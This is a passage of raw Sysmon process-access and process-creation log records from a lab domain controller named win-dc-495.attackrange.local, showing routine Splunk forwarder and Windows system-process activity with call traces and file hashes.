Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.487{59A5CD1D-8F65-6005-F400-00000000A301}28443648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F65-6005-F400-00000000A301}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8F65-6005-F400-00000000A301}2844C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F65-6005-F400-00000000A301}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8F65-6005-F400-00000000A301}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F66-6005-F500-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8F66-6005-F500-00000000A301}4860C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F66-6005-F500-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 